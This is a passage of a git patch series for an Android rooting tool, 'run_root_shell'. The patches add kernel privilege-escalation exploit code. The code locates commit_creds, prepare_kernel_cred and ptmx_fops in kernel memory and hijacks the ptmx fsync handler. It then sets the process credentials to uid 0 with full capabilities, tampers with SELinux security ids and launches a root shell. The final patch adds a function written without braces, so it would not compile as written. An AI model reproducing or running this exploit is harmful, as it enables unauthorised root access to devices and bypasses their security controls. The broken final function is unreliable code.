+ struct cred *replacement_session_keyring; + char comm[16]; +}; + +static inline struct thread_info * +current_thread_info(void) +{ + register unsigned long sp asm ("sp"); + return (struct thread_info *)(sp & ~(THREAD_SIZE - 1)); +} + +static bool +is_cpu_timer_valid(struct list_head *cpu_timer) +{ + if (cpu_timer->next != cpu_timer->prev) { + return false; + } + + if ((unsigned long int)cpu_timer->next < KERNEL_START) { + return false; + } + + return true; +} + +static void +obtain_root_privilege_by_modify_task_cred(void) +{ + struct thread_info *info; + struct cred *cred; + struct task_security_struct *security; + int i; + + info = current_thread_info(); + cred = NULL; + + for (i = 0; i < 0x400; i+= 4) { + struct task_struct_partial *task = ((void *)info->task) + i; + + if (is_cpu_timer_valid(&task->cpu_timers[0]) + && is_cpu_timer_valid(&task->cpu_timers[1]) + && is_cpu_timer_valid(&task->cpu_timers[2]) + && task->real_cred == task->cred) { + cred = task->cred; + break; + } + } + + if (cred == NULL) { + return; + } + + cred->uid = 0; + cred->gid = 0; + cred->suid = 0; + cred->sgid = 0; + cred->euid = 0; + cred->egid = 0; + cred->fsuid = 0; + cred->fsgid = 0; + + cred->cap_inheritable.cap[0] = 0xffffffff; + cred->cap_inheritable.cap[1] = 0xffffffff; + cred->cap_permitted.cap[0] = 0xffffffff; + cred->cap_permitted.cap[1] = 0xffffffff; + cred->cap_effective.cap[0] = 0xffffffff; + cred->cap_effective.cap[1] = 0xffffffff; + cred->cap_bset.cap[0] = 0xffffffff; + cred->cap_bset.cap[1] = 0xffffffff; + + security = cred->security; + if (security) { + if (security->osid != 0 + && security->sid != 0 + && security->exec_sid == 0 + && security->create_sid == 0 + && security->keycreate_sid == 0 + && security->sockcreate_sid == 0) { + security->osid = 1; + security->sid = 1; + } + } +} + +static void +obtain_root_privilege_by_commit_creds(void) +{ + commit_creds(prepare_kernel_cred(0)); +} + +static void (*obtain_root_privilege_func)(void); + +void +obtain_root_privilege(void) +{ + if (obtain_root_privilege_func) { + obtain_root_privilege_func(); + } +} + +static bool +run_obtain_root_privilege(void *user_data) +{ + int fd; + int ret; + + obtain_root_privilege_func = obtain_root_privilege_by_commit_creds; + + fd = open(PTMX_DEVICE, O_WRONLY); + + ret = fsync(fd); + + if (getuid() != 0) { + printf("commit_creds(): failed. Try to hack task->cred.\n"); + + obtain_root_privilege_func = obtain_root_privilege_by_modify_task_cred; + ret = fsync(fd); + } + + close(fd); + + return (ret == 0); +} + +static bool +run_exploit(void) +{ + setup_ptmx_fops_fsync_address(); + if (!ptmx_fops_fsync_address) { + return false; + } + + return attempt_exploit(ptmx_fops_fsync_address, + (unsigned long int)&obtain_root_privilege, 0, + run_obtain_root_privilege, NULL); } void -device_detected(void) { +device_detected(void) +{ char device[PROP_VALUE_MAX]; char build_id[PROP_VALUE_MAX]; - + __system_property_get("ro.product.model", device); __system_property_get("ro.build.display.id", build_id); - + printf("\n\nDevice detected: %s (%s)\n\n", device, build_id); - return; } -int main(int argc, char **argv) { +static bool +find_ptmx_fops_address(kallsyms *info, void *mem, size_t length) +{ + find_ptmx_fops_hint_t hint; + + hint.ptmx_open_address = kallsyms_in_memory_lookup_name(info, "ptmx_open"); + if (!hint.ptmx_open_address) { + return false; + } + + hint.tty_release_address = kallsyms_in_memory_lookup_name(info, "tty_release"); + if (!hint.tty_release_address) { + return false; + } + + hint.tty_fasync_address = kallsyms_in_memory_lookup_name(info, "tty_fasync"); + if (!hint.tty_fasync_address) { + return false; + } + + return setup_ptmx_fops_address_in_memory(mem, length, &hint); +} + +bool find_variables_in_memory(void *mem, size_t length) +{ + kallsyms *info; + + printf("Search address in memroy...\n"); + + info = kallsyms_in_memory_init(mem, length); + if (info) { + printf("Using kallsyms_in_memroy...\n"); + + if (!prepare_kernel_cred) { + prepare_kernel_cred = (prepare_kernel_cred_t)kallsyms_in_memory_lookup_name(info, "prepare_kernel_cred"); + } + + if (!commit_creds) { + commit_creds = (commit_creds_t)kallsyms_in_memory_lookup_name(info, "commit_creds"); + } + + if (!ptmx_fops) { + ptmx_fops = (void *)kallsyms_in_memory_lookup_name(info, "ptmx_fops"); + + if (!ptmx_fops) { + find_ptmx_fops_address(info, mem, length); + } + } + + kallsyms_in_memory_free(info); + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + return true; + } + } + + setup_prepare_kernel_cred_address_in_memory(mem, length); + setup_commit_creds_address_in_memory(mem, length); + + return prepare_kernel_cred && commit_creds && ptmx_fops; +} - if (argc == 2 && strcmp(argv[1], "get_root") == 0) { - return get_root(); - } else if (argc == 2 && strcmp(argv[1], "get_address") == 0) { - return get_address(); +bool +try_get_symbol(void) +{ + if (get_address()) { + return true; } + + print_reason_device_not_supported(); - return print_help(argv[0]); + return false; +} + +bool +setup_variables(void) +{ + setup_prepare_kernel_cred_address(); + setup_commit_creds_address(); + setup_ptmx_fops_address(); + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + return true; + } + + printf("Try to find address in memory...\n"); + if (!run_with_mmap(find_variables_in_memory)) { + printf("\n"); + run_with_memcpy(find_variables_in_memory); + } + + if (prepare_kernel_cred && commit_creds && ptmx_fops) { + printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); + printf(" commit_creds = %p\n", commit_creds); + printf(" ptmx_fops = %p\n", ptmx_fops); + +#ifdef HAS_SET_SYMBOL_ADDRESS + device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred); + device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds); + device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops); +#endif /* HAS_SET_SYMBOL_ADDRESS */ + + return true; + } + + if (!prepare_kernel_cred) { + printf("Failed to get prepare_kernel_cred address.\n"); + } + + if (!commit_creds) { + printf("Failed to get commit_creds address.\n"); + } + + if (!ptmx_fops) { + printf("Failed to get ptmx_fops address.\n"); + } + + if (try_get_symbol()) { + printf("This device information has been added to the database!\n"); + printf("Please to retry.\n"); + } + + return false; +} + +int +main(int argc, char **argv) +{ + char* command = NULL; + int i; + for (i = 1; i < argc; i++) { + if (!strcmp(argv[i], "-c")) { + if (++i < argc) { + command = argv[i]; + } + } + } + + device_detected(); + + if (!setup_variables()) { + printf("Failed to setup variables.\n"); + exit(EXIT_FAILURE); + } + + run_exploit(); + + if (getuid() != 0) { + printf("Failed to obtain root privilege.\n"); + exit(EXIT_FAILURE); + } + + if (command == NULL) { + system("/system/bin/sh"); + } else { + execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); + } + + exit(EXIT_SUCCESS); } +/* + vi:ts=2:nowrap:ai:expandtab:sw=2 + */ \ No newline at end of file From 999e6799c035f97f8bb32d8998264e55f0fe952d Mon Sep 17 00:00:00 2001 From: scoty755 Date: Fri, 16 Oct 2015 00:53:59 +0900 Subject: [PATCH 25/26] Revert "updated readme" --- README.md | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/README.md b/README.md index 8564aa1..0463a05 100644 --- a/README.md +++ b/README.md @@ -47,8 +47,4 @@ Running `adb shell chmod 777 /data/local/tmp/*` * Run the command on the phone: - If the device is not listed in the database, you will need to run this command at the beginning - `adb shell /data/local/tmp/run_root_shell get_address` - - If you try to privilege escalation, you must run this command - `adb shell /data/local/tmp/run_root_shell get_root` + `adb shell /data/local/tmp/run_root_shell` From 7456c4b2655817ee3182129e34d0ad810d47a02d Mon Sep 17 00:00:00 2001 From: scoty755 Date: Fri, 18 Dec 2015 00:08:08 +0900 Subject: [PATCH 26/26] Change the setup process --- main.c | 24 ++++++++++++++++++------ 1 file changed, 18 insertions(+), 6 deletions(-) diff --git a/main.c b/main.c index 4fa0d5c..fb8bd63 100644 --- a/main.c +++ b/main.c @@ -354,16 +354,28 @@ setup_variables(void) printf("Failed to get ptmx_fops address.\n"); } - if (try_get_symbol()) { - printf("This device information has been added to the database!\n"); - printf("Please to retry.\n"); - } - print_reason_device_not_supported(); return false; } +bool +try_lookup_symbol(void) + +if (setup_variables()) { + return true; +} + + +if (try_get_symbol()) { + printf("This device information has been added to the database!\n"); + return true; +} + + return false; + +} + int main(int argc, char **argv) { @@ -379,7 +391,7 @@ main(int argc, char **argv) device_detected(); - if (!setup_variables()) { + if (!try_lookup_symbol()) { printf("Failed to setup variables.\n"); exit(EXIT_FAILURE); }